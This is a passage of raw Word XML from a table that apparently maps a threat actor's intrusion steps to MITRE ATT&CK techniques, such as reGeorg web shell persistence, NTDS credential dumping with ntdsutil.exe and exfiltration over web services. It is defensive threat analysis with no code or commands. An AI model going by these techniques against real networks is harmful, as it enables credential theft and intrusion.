                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AEF4D08" w14:textId="4F2C543A" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="006B5426" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696ADCAF" w14:textId="567AB159" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] The NSA says that once they gain access, they will spread laterally through the network while deploying a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>reGeorg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> web shell for persistence, harvesting other credentials, and stealing files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00762FF5" w:rsidRPr="00B857D7" w14:paraId="5C96A5F8" w14:textId="77777777" w:rsidTr="00E53D3E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699B1A53" w14:textId="7280D178" w:rsidR="00762FF5" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4DD444" w14:textId="77777777" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD5270C" w14:textId="77777777" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">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2E47B208" w14:textId="32A4B00A" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F859901" w14:textId="77777777" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134B6267" w14:textId="77777777" w:rsidR="00762FF5" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E0AD53F" w14:textId="11D33740" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="006B5426" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F75C23" w14:textId="62E5A078" w:rsidR="00762FF5" w:rsidRPr="00105B0A" w:rsidRDefault="00762FF5" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To web shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0083283A" w:rsidRPr="00B857D7" w14:paraId="07FE3CB0" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1629809C" w14:textId="61CFAC86" w:rsidR="0083283A" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5137AC59" w14:textId="723A5D06" w:rsidR="0083283A" w:rsidRDefault="0083283A" w:rsidP="00151FAB">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FDBBDB4" w14:textId="1F09F408" w:rsidR="0083283A" w:rsidRPr="004526D2" w:rsidRDefault="0083283A" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0083283A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0083283A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C098766" w14:textId="354BAC5C" w:rsidR="0083283A" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649C01D5" w14:textId="77777777" w:rsidR="0083283A" w:rsidRPr="00B857D7" w:rsidRDefault="0083283A" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FFF47E8" w14:textId="66ECBC5F" w:rsidR="0083283A" w:rsidRDefault="0037271B" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F766EF8" w14:textId="25243B5F" w:rsidR="0083283A" w:rsidRPr="00B857D7" w:rsidRDefault="006B5426" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8BD1D8" w14:textId="47C70F28" w:rsidR="0083283A" w:rsidRPr="004526D2" w:rsidRDefault="0083283A" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004526D2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>The actors used the ntdsutil.exe utility, which was present on a target's Active Directory® server to export the Active Directory database for credential access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2729F" w:rsidRPr="00B857D7" w14:paraId="2C64EC0F" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E38672" w14:textId="4B47440F" w:rsidR="00C2729F" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA98E92" w14:textId="5ECBC7D4" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="004526D2" w:rsidP="00151FAB">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0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02CF31A3" w14:textId="73405A5F" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="004526D2" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004526D2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1003.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004526D2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>OS Credential Dumping: NTDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AFEF56" w14:textId="7222A198" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357DAE21" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318E0A72" w14:textId="2BDFCBD4" w:rsidR="00C2729F" w:rsidRDefault="004526D2" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="313384D1" w14:textId="6D1E239F" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="006B5426" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="207B11C1" w14:textId="346934E5" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="004526D2" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004526D2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>The actors used the ntdsutil.exe utility, which was present on a target's Active Directory® server to export the Active Directory database for credential access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00762FF5" w:rsidRPr="00B857D7" w14:paraId="3788A13D" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E47C065" w14:textId="1FC8F4B2" w:rsidR="00762FF5" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21ACE478" w14:textId="2B191736" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C59A27" w14:textId="11653F33" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00762FF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00762FF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1567 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00762FF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over Web Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37B77361" w14:textId="359E49AB" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D22656" w14:textId="77777777" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001564DF" w14:textId="147CEBEE" w:rsidR="00762FF5" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FCB7842" w14:textId="0ADFBE87" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="006B5426" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD14D20" w14:textId="5A09FBD8" w:rsidR="00762FF5" w:rsidRPr="00B857D7" w:rsidRDefault="00762FF5" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00762FF5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2729F" w:rsidRPr="00B857D7" w14:paraId="50CCA0D3" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20184368" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDEADE4" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C1FE1C" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="273E62CC" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F60F1CC" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6528CFBC" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B65B14" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D0EACE" w14:textId="77777777" w:rsidR="00C2729F" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F92B92" w:rsidRPr="00B857D7" w14:paraId="32F035A8" w14:textId="77777777" w:rsidTr="00962639">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="780A54BA" w14:textId="4169604B" w:rsidR="00F92B92" w:rsidRDefault="00F92B92" w:rsidP="00962639">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
